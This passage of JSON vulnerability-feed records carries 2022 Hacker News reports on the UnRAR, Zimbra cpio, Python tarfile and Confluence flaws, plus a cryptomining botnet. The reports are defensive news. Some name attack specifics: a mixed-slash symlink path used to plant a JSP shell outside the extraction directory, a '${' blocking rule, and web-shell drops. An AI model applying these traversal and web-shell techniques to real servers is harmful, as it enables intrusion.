"NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-05T05:54:00", "type": "thn", "title": "CISA Adds Zimbra Email Vulnerability to its Exploited Vulnerabilities Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-05T05:54:43", "id": "THN:EAE0157F6308D86DB939FA200A017132", "href": "https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-29T09:57:40", "description": "A new security vulnerability has been disclosed in RARlab's UnRAR utility that, if 
successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.\n\nThe flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nFollowing responsible disclosure on May 4, 2022, the shortcoming was addressed by RarLab as part of [version 6.12](<https://www.rarlab.com/download.htm>) released on May 6. Other versions of the software, including those for Windows and Android operating systems, are not impacted.\n\n\"An attacker is able to create files outside of the target extraction directory when an application or victim user extracts an untrusted archive,\" SonarSource researcher Simon Scannell [said](<https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/>) in a Tuesday report. \"If they can write to a known location, they are likely to be able to leverage it in a way leading to the execution of arbitrary commands on the system.\"\n\nIt's worth pointing out that any software that utilizes an unpatched version of UnRAR to extract untrusted archives is affected by the flaw.\n\nThis also includes Zimbra Collaboration Suite, where the vulnerability could lead to pre-authentication remote code execution on a vulnerable instance, giving the attacker complete access to an email server that could then be abused to access or overwrite other internal resources within the organization's network.\n\nImage Source: [Simon Scannell](<https://twitter.com/scannell_simon/status/1541800107909185537>)\n\nThe vulnerability, at its heart, relates to a [symbolic link](<https://en.wikipedia.org/wiki/Symbolic_link>) attack 
in which a RAR archive is crafted such that it contains a symlink that's a mix of both forward slashes and backslashes (e.g., \"..\\\\..\\\\..\\tmp/shell\") so as to bypass current checks and extract it outside of the expected directory.\n\nMore specifically, the weakness has to do with a function that's designed to convert backslashes ('\\') to forward slashes ('/') so that a RAR archive created on Windows can be extracted on a Unix system, effectively altering the aforementioned symlink to \"../../../tmp/shell.\"\n\nBy taking advantage of this behavior, an attacker can write arbitrary files anywhere on the target filesystem, including creating a JSP shell in Zimbra's web directory and executing malicious commands.\n\n\"The only requirement for this attack is that UnRAR is installed on the server, which is expected as it is required for RAR archive virus-scanning and spam-checking,\" Scannell noted.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-29T09:29:00", "type": "thn", "title": "New UnRAR Vulnerability Could Let Attackers Hack Zimbra Webmail Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", 
"availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-06-29T09:29:21", "id": "THN:7657424EABF9BB266876E3BD437269F4", "href": "https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-25T03:59:16", "description": "The **8220 cryptomining group** has expanded in size to encompass as many as 30,000 infected hosts, up from 2,000 hosts globally in mid-2021.\n\n\"8220 Gang is one of the many low-skill crimeware gangs we continually observe infecting cloud hosts and operating a botnet and cryptocurrency miners through known vulnerabilities and remote access brute forcing infection vectors,\" Tom Hegel of SentinelOne [said](<https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/>) in a Monday report.\n\nThe growth is said to have been fueled through the use of Linux and common cloud application vulnerabilities and poorly secured configurations for services such as Docker, Apache WebLogic, and Redis.\n\nActive since early 2017, the Chinese-speaking, Monero-mining threat actor was most recently [seen](<https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html>) targeting i686 and x86_64 Linux systems by means of weaponizing a newly disclosed remote code execution exploit for Atlassian Confluence Server (CVE-2022-26134) to drop the PwnRig miner 
payload.\n\n\"Victims are not targeted geographically, but simply identified by their internet accessibility,\" Hegel pointed out.\n\nBesides executing the PwnRig cryptocurrency miner, the infection script is also designed to remove cloud security tools and carry out SSH brute-forcing via a list of 450 hard-coded credentials to further propagate laterally across the network.\n\nThe newer versions of the script are also known to employ blocklists to avoid compromising specific hosts, such as honeypot servers that could flag their illicit efforts.\n\nThe PwnRig cryptominer, which is based on the open source Monero miner XMRig, has received updates of its own as well, using a fake FBI subdomain with an IP address pointing to a legitimate Brazilian federal government domain to create a rogue [pool](<https://en.wikipedia.org/wiki/Mining_pool>) request and obscure the real destination of the generated money.\n\nThe ramping up of the operations is also viewed as an [attempt](<https://thehackernews.com/2022/07/cloud-based-cryptocurrency-miners.html>) to offset falling prices of cryptocurrencies, and it underscores a heightened \"battle\" to take control of victim systems from competing cryptojacking-focused groups.\n\n\"Over the past few years 8220 Gang has slowly evolved their simple, yet effective, Linux infection scripts to expand a botnet and illicit cryptocurrency miner,\" Hegel concluded. \"The group has made changes over the recent weeks to expand the botnet to nearly 30,000 victims globally.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T11:44:00", "type": "thn", "title": "This Cloud Botnet Has Hijacked 30,000 Systems to Mine Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-25T03:41:26", "id": "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "href": "https://thehackernews.com/2022/07/this-cloud-botnet-has-hijacked-30000.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T04:01:33", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a recently disclosed security flaw in the UnRAR utility to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nTracked as CVE-2022-30333 (CVSS score: 7.5), the issue concerns a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nThis means that an adversary could exploit the flaw to drop arbitrary files on a target system that has the utility installed simply by decompressing the file. The vulnerability was [revealed](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>) by SonarSource researcher Simon Scannell in late June.\n\n\"RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation,\" the agency [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in an advisory.\n\nNot much is known about the nature of the attacks, but the disclosure is evidence of a growing trend wherein threat actors are quick to scan for vulnerable systems after flaws are publicly disclosed and take the opportunity to launch malware and ransomware campaigns.\n\nOn top of that, CISA has also added [CVE-2022-34713](<https://thehackernews.com/2022/08/microsoft-issues-patches-for-121-flaws.html>) to the catalog after Microsoft, as part of its Patch Tuesday updates on August 9, revealed that it has seen indications that the vulnerability has been exploited in the wild.\n\nSaid to be a variant of the vulnerability publicly known as [DogWalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>), the shortcoming in the Microsoft Windows Support Diagnostic Tool (MSDT) component could be leveraged by a rogue actor to execute arbitrary code on susceptible systems by tricking a victim into opening a decoy file.\n\nFederal agencies in the U.S. 
are mandated to apply the updates for both flaws by August 30 to reduce their exposure to cyberattacks.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-10T06:59:00", "type": "thn", "title": "CISA Issues Warning on Active Exploitation of UnRAR Software for Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333", "CVE-2022-34713"], "modified": "2022-08-11T03:56:12", "id": "THN:A48A11A9708B43B68518F6625F1C0CB8", "href": "https://thehackernews.com/2022/08/cisa-issues-warning-on-active.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-10-10T04:05:08", "description": 
"A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue.\n\nThe shortcoming, assigned [CVE-2022-41352](<https://nvd.nist.gov/vuln/detail/CVE-2022-41352>), carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected installations.\n\n\"The vulnerability is due to the method ([cpio](<https://en.wikipedia.org/wiki/Cpio>)) in which Zimbra's antivirus engine ([Amavis](<https://en.wikipedia.org/wiki/Amavis>)) scans inbound emails,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/>) in an analysis published this week.\n\nThe issue is said to have been abused since early September 2022, according to [details](<https://forums.zimbra.org/viewtopic.php?t=71153&p=306532>) shared on Zimbra forums. 
While a fix is yet to be released, the software services company is urging users to install the \"pax\" utility and restart the Zimbra services.\n\n\"If the [pax package](<https://manpages.ubuntu.com/manpages/xenial/man1/pax.1.html>) is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot,\" the company [said](<https://blog.zimbra.com/2022/09/security-update-make-sure-to-install-pax-spax/>) last month.\n\nThe vulnerability, which is present in versions 8.8.15 and 9.0 of the software, affects several Linux distributions such as Oracle Linux 8, Red Hat Enterprise Linux 8, Rocky Linux 8, and CentOS 8, with the exception of Ubuntu, where pax is already installed by default.\n\nSuccessful exploitation of the flaw requires an attacker to email an archive file (CPIO or TAR) to a susceptible server, which is then inspected by Amavis using the cpio file archiver utility to extract its contents.\n\n\"Since cpio has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access,\" Rapid7 researcher Ron Bowes said. \"The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.\"\n\nZimbra said it expects the vulnerability to be addressed in the next software patch, which will remove the dependency on cpio and instead make pax a requirement. 
However, it has not offered a specific timeframe by when the fix will be available.\n\nRapid7 also noted that CVE-2022-41352 is \"effectively identical\" to [CVE-2022-30333](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>), a path traversal flaw in the Unix version of RARlab's unRAR utility which came to light earlier this June, the only difference being that the new flaw leverages CPIO and TAR archive formats instead of RAR.\n\nEven more troublingly, Zimbra is said to be further vulnerable to another [zero-day privilege escalation flaw](<https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352/rapid7-analysis>), which could be chained with the cpio zero-day to achieve remote root compromise of the servers.\n\nThe fact that Zimbra has been a popular target for threat actors is by no means new. In August, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>) of adversaries exploiting multiple flaws in the software to breach networks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T07:50:00", "type": "thn", "title": "Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333", "CVE-2022-41352"], "modified": "2022-10-10T03:51:05", "id": "THN:0F44740E1DC86B52AFAEA1D981FF08AE", "href": "https://thehackernews.com/2022/10/hackers-exploiting-unpatched-rce-flaw.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-09-23T06:04:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbA2bIlmOXJ1eRQQJynmQkCNR9sE-Tfg4FDN-C8ZRjxR8tQglrYyHz9zpGG2ey5xk4F8vqcnDPLKOPTI3rvdORqccx_FiPUgQhCC5MCrB9Eq01BWr1jsYDchcRHTVjgJ0HT4gApba41Dt1PabpG8gC_YGsJ7gW0-PPy5yOJjPGbi16s7Vn0KoF8A0C/s728-e100/code.jpg>)\n\nAs many as 350,000 open source projects are believed to be potentially vulnerable 
to exploitation as a result of a security flaw in a Python module that has remained unpatched for 15 years.\n\nThe open source repositories span a number of industry verticals, such as software development, artificial intelligence/machine learning, web development, media, security, and IT management.\n\nThe shortcoming, tracked as [CVE-2007-4559](<https://nvd.nist.gov/vuln/detail/CVE-2007-4559>) (CVSS score: 6.8), is rooted in the tarfile module, successful exploitation of which could lead to code execution from an arbitrary file write.\n\n\"The vulnerability is a path traversal attack in the extract and extractall functions in the tarfile module that allow an attacker to overwrite arbitrary files by adding the '..' sequence to filenames in a TAR archive,\" Trellix security researcher Kasimir Schulz [said](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/tarfile-exploiting-the-world.html>) in a writeup.\n\nOriginally disclosed in August 2007, the bug has to do with how a specially crafted tar archive can be leveraged to overwrite arbitrary files on a target machine simply upon opening the file.\n\nPut simply, a threat actor can exploit the weakness by uploading a malicious tarfile in a manner that makes it possible to escape the directory that a file is intended to be extracted to and achieve code execution, allowing the adversary to potentially seize control of a target device.\n\n\"Never extract archives from untrusted sources without prior inspection,\" the Python documentation for tarfile [reads](<https://docs.python.org/3/library/tarfile.html>). \"It is possible that files are created outside of path, e.g. 
members that have absolute filenames starting with '/' or filenames with two dots '..'.\"\n\nThe vulnerability is also reminiscent of a recently disclosed security flaw in RARlab's UnRAR utility ([CVE-2022-30333](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>)) that could lead to remote code execution.\n\nTrellix has further released a custom utility called [Creosote](<https://github.com/advanced-threat-research/Creosote>) to scan for projects vulnerable to CVE-2007-4559, using it to uncover the vulnerability in the Spyder Python IDE as well as Polemarch.\n\n\"Left unchecked, this vulnerability has been unintentionally added to hundreds of thousands of open- and closed-source projects worldwide, creating a substantial software supply chain attack surface,\" Douglas McKee [noted](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/limiting-the-software-supply-chain-attack-surface.html>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-09-22T09:17:00", "type": "thn", "title": "15-Year-Old Unpatched Python Vulnerability Potentially Affects Over 350,000 Projects", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": 
"MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4559", "CVE-2022-30333"], "modified": "2022-09-23T04:29:36", "id": "THN:2DA6F98EC7A48A092478A6E6EB267C1C", "href": "https://thehackernews.com/2022/09/15-year-old-unpatched-python.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T05:57:47", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj9rIpLd7Wt8S6XBYbfSyi_LxY3hVen8bxDxWgv56ywl84WByL1Zl26yIu_oQ18uh4gvIi8vulmy9q1SZTMxCmqhEiWx0sm82_GHXfs821huyPVdY3i9HR5j_Dk6uxz27udcCKd-Tl7Z1edq42KHthx8Ln0XuGeTqNQ5nDnXn7z5jvyBqljfIiqhIVu/s728-e100/ransomware.jpg>)\n\nA recently patched [critical security flaw](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>) in Atlassian Confluence Server and Data Center products is being actively weaponized in real-world attacks to drop cryptocurrency miners and ransomware payloads.\n\nIn at least two of the Windows-related incidents observed by cybersecurity vendor Sophos, adversaries exploited the vulnerability to deliver Cerber ransomware and a [crypto miner](<https://blog.checkpoint.com/2022/06/09/crypto-miners-leveraging-atlassian-zero-day-vulnerability/>) called z0miner on victim networks.\n\nThe bug ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>), CVSS score: 9.8), which was [patched](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>) by Atlassian on June 3, 2022, enables an unauthenticated actor to inject malicious code that paves the way of remote code execution (RCE) on affected installations of the collaboration suite. 
All supported versions of Confluence Server and Data Center are affected.\n\nOther notable malware pushed as part of disparate instances of attack activity include Mirai and Kinsing bot variants, a rogue package called [pwnkit](<https://thehackernews.com/2022/01/12-year-old-polkit-flaw-lets.html>), and Cobalt Strike by way of a web shell deployed after gaining an initial foothold into the compromised system.\n\n\"The vulnerability, CVE-2022-26134, allows an attacker to spawn a remotely-accessible shell, in-memory, without writing anything to the server's local storage,\" Andrew Brandt, principal security researcher at Sophos, [said](<https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj4ylTTjRkYLtYQCSXoVz8gUgRgTa98lR7XaqcG9UbybTcDEi9J5hfotnq_Gutzoj81P5XHccmBjiW9E7KZlw5edBNyVl0N0zwIwuyQGM4A95z1ZdyCtPLIHlvFzE_XXxyZJjC55Sp3sPQrsczwhlKexPSQGqBrt0qHXhWsFMoMEcBZXvs-OTYPTLet/s728-e100/code.jpg>)\n\nThe disclosure overlaps with similar warnings from Microsoft, which [revealed](<https://twitter.com/MsftSecIntel/status/1535417776290111489>) last week that \"multiple adversaries and nation-state actors, including [DEV-0401](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0401>) and DEV-0234, are taking advantage of the Atlassian Confluence RCE vulnerability CVE-2022-26134.\"\n\nDEV-0401, described by Microsoft as a \"China-based lone wolf turned LockBit 2.0 affiliate,\" has also been previously linked to ransomware deployments targeting internet-facing systems running VMWare Horizon ([Log4Shell](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>)), Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>)), and on-premises Exchange servers 
([ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>)).\n\nThe development is emblematic of an [ongoing trend](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) where threat actors are increasingly capitalizing on newly disclosed critical vulnerabilities rather than exploiting publicly known, dated software flaws across a broad spectrum of targets.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-18T04:11:00", "type": "thn", "title": "Atlassian Confluence Flaw Being Used to Deploy Ransomware and Crypto Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-18T04:11:14", "id": "THN:0488E447E08622B0366A0332F848212D", "href": 
"https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T09:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgtFRIbOmYLbsTQsfQcmDa8dd7UbU-isTy7dToS2Gy1p7s--Zt-QgfjUpligZQwwZouhjIgGzL8kjD1QlluSfAvuZ7I7GKPJG21wA9tfWYRmChZ7jK57W-8AeMWNQDwHO9tEJkbBfs3AltDvfY7kp3Bl13jp3djDlSN_7F0g5plbOk_BGleGYX9aFNC/s728-e100/hackers.jpg>)\n\nAtlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.\n\nThe Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as **CVE-2022-26134**.\n\n\"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server,\" it [said](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) in an advisory.\n\n\"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix.\" Specifics of the security flaw have been withheld until a software patch is available.\n\nAll supported versions of Confluence Server and Data Center are affected, although it's expected that all versions of the enterprise solution are potentially vulnerable. The earliest impacted version is yet to be ascertained.\n\nIn the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling the instances altogether. 
Alternatively, it has recommended implementing a web application firewall (WAF) rule which blocks URLs containing \"${\" to reduce the risk.\n\nVolexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.\n\nThe attack chain involved leveraging the Atlassian zero-day exploit \u2014 a command injection vulnerability \u2014 to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.\n\n\"[Behinder](<https://github.com/Freakboy/Behinder>) provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike,\" the researchers [said](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). \"At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out.\"\n\nSubsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including [China Chopper](<https://www.mandiant.com/resources/the-little-malware-that-could-detecting-and-defeating-the-china-chopper-web-shell>) and a custom file upload shell to exfiltrate arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-22T08:18:20", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNDB_6urGQ6KJEXanQt_pnHjch23bL6gkveY_rOhDjbe4aoM3fY-HCttsNtRUZDqHuVy9mNU18TLb4dYkj4PS1k95YfJlM8CL-hT9QNezW6GwsBeDapBrHrXEriDxJIeTtZI57ZQvwAS_Tic8ecD0wm8qgF6Aq2T-VPvXYXxJNg8SREGCGZlwHdhzZ/s728-e100/malware.jpg>)\n\nA now-patched critical security flaw affecting Atlassian 
